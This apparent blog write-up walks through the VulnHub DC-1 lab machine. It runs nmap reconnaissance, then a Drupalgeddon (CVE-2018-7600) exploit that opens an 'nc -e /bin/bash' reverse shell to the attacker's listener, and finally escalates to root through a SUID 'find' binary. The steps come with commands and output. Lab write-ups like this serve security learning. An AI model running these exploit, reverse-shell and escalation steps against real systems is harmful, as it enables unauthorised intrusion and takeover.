Posted on by

DC-1 – Writeup

Details

This machine is https://www.vulnhub.com/entry/dc-1-1,292/

Recon Phase

Start by finding the target

root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00020s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00015s latency).
MAC Address: 08:00:27:8B:07:5E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00052s latency).
MAC Address: 08:00:27:AA:94:9F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.76 seconds

Service discovery

root@kali:~# nmap -sV -p- 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00015s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
44068/tcp open  status  1 (RPC #100024)

Shell Hunting

Onto port 80 at http://192.168.56.102/

Screenshot 1

Drupal, no changelog but I’ll try drupalgeddon https://github.com/Jack-Barradell/exploits/tree/master/CVE-2018-7600 first opening a listener to check with

root@kali:~# nc -nlvp 4444

Trigger a test

root@kali:~# python3 cve-2018-7600-drupal7.py -t 192.168.56.102 -c "nc 192.168.56.101 4444"
[+] Sending command exploit
[+] Prepping trigger
[+] Sending trigger
[+] Result:

And back in the listener

connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 55724

Now I’ll do it again but get a shell

root@kali:~# nc -nlvp 4444
python3 cve-2018-7600-drupal7.py -t 192.168.56.102 -c "nc 192.168.56.101 4444 -e /bin/bash"
[+] Sending command exploit
[+] Prepping trigger
[+] Sending trigger
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 55726
$

and that’s a shell

Root Hunting

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-1:/var/www$
www-data@DC-1:/var/www$ find / -perm -u=s 2>/dev/null
[SNIP]
/usr/bin/find
[SNIP]

Well that’s nice

www-data@DC-1:/var/www$ find . -exec /bin//sh \;
#

That’s a shell

# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

Rooted, flag time

# cd /root
# ls -la
drwx------  4 root root 4096 Feb 28 12:11 .
drwxr-xr-x 23 root root 4096 Feb 19 22:34 ..
drwx------  2 root root 4096 Feb 19 22:30 .aptitude
-rw-------  1 root root   44 Feb 28 12:11 .bash_history
-rw-r--r--  1 root root  949 Feb 19 23:03 .bashrc
drwxr-xr-x  3 root root 4096 Feb 19 23:03 .drush
-rw-r--r--  1 root root  140 Nov 20  2007 .profile
-rw-r--r--  1 root root  173 Feb 19 23:43 thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

Published by Jack

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.